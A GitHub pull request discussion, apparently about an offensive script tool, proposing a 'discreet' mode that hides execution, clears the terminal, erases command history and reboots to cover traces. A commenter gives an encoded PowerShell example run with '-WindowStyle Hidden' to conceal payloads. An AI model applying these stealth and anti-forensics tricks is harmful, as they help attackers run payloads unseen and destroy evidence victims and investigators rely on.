Skip to content

Conversation

@nicolasmf
Copy link

Discreet option launches script in background and clears terminal, deletes command history and reboots to cover execution traces

@xpsknoth
Copy link

@nicolasmf
I quite agree that these should be added
There are many people who just come to learn. Most of them still do not understand these languages.

This is for anyone who doesn't know.
Here's how to open scripts in the background.

  1. Add " -WindowStyle Hidden " at the end of the payload this is the easiest way
    example : powershell -e JABzAD0AJwAzADYAZAA4AC0AMQA4ADAALQAxADgAMw -WindowStyle Hidden
    Or
  2. Just create raw payload and add " -WindowStyle Hidden " after that encode into base64
    These methods work for me well.😊

@nicolasmf
Copy link
Author

Thank you, @xpsknoth, for your explanations !

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

2 participants